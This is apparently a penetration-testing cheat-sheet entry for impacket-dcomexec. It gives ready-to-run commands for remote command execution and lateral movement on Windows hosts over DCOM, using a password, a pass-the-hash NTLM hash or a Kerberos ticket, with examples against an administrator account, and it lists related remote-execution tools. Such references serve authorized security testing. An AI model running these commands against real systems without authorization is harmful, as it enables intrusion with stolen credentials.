Impacket DCOMExec
Execute commands via DCOM (Distributed Component Object Model)
- Tool
- impacket-dcomexec
- Category
- Lateral Movement / Remote Shells
- Platform
- linux
- Requires
- password
- Protocols
- SMB
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
impacket-dcomexec '<domain>/<user>:<password>@<ip>'
Credential variants
The same attack using a different authentication material.
NTLM Hash requires NTLM hash
impacket-dcomexec -hashes ':<hash>' '<domain>/<user>@<ip>'
Kerberos Ticket requires Kerberos ticket
impacket-dcomexec -k -no-pass '<domain>/<user>@<ip>'
Examples
impacket-dcomexec 'CORP/administrator:password@192.168.1.100'
impacket-dcomexec -hashes ':e19ccf75ee54e06b06a5907af13cef42' 'CORP/administrator@192.168.1.100'
Tags
Related commands
- Impacket Secrets Dump Dump hashes from remote Windows system (SAM, LSA, NTDS)
- Evil-WinRM Shell Windows Remote Management shell connection
- Impacket AtExec Execute commands via Windows Task Scheduler service
- Impacket atexec.py (Scheduled Task) One-shot command execution by creating, running, and deleting a scheduled task over…
- Impacket dcomexec.py Execute commands over DCOM (MMC20.Application / ShellWindows / ShellBrowserWindow)…
- Impacket PSExec Execute commands via PSExec service
- Impacket SMBExec Execute commands via SMB service creation
- Impacket WMIExec Execute commands via WMI (Windows Management Instrumentation)